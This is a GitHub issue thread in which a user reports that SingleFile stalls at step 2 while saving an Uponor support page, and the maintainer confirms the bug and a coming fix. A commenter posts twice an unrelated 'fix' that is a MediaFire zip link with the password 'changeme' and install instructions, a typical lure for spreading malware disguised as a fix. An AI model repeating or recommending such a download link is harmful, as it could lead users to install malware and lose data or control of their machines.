### ISSUE TITLE
Can't save certain site, stuck on step 2

### ISSUE THREAD

**Issue by NewsGuyTor** [gildas-lormeau/SingleFile#1545]
**Describe the bug**
[This site](https://smatrixpulse-support.uponor.com/IOM_Wave_PULSE/Uponor_Smatrix_Wave_PULSE_nb-NO.html) hangs in Step 2, on both Firefox and Chrome. I've tried different settings.

**To Reproduce**
1. Go to '[...'](https://smatrixpulse-support.uponor.com/IOM_Wave_PULSE/Uponor_Smatrix_Wave_PULSE_nb-NO.html)
2. Click on 'Save'
3. Wait

**Expected behavior**
Should continue to step 3

**Environment**
 - OS: macOS
 - Browser: Chrome, Firefox
 - Version: Latest

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gildas-lormeau** [comment]
Thank you, I confirm I was able to reproduce the issue. It will be fixed in the next version (publish in progress).
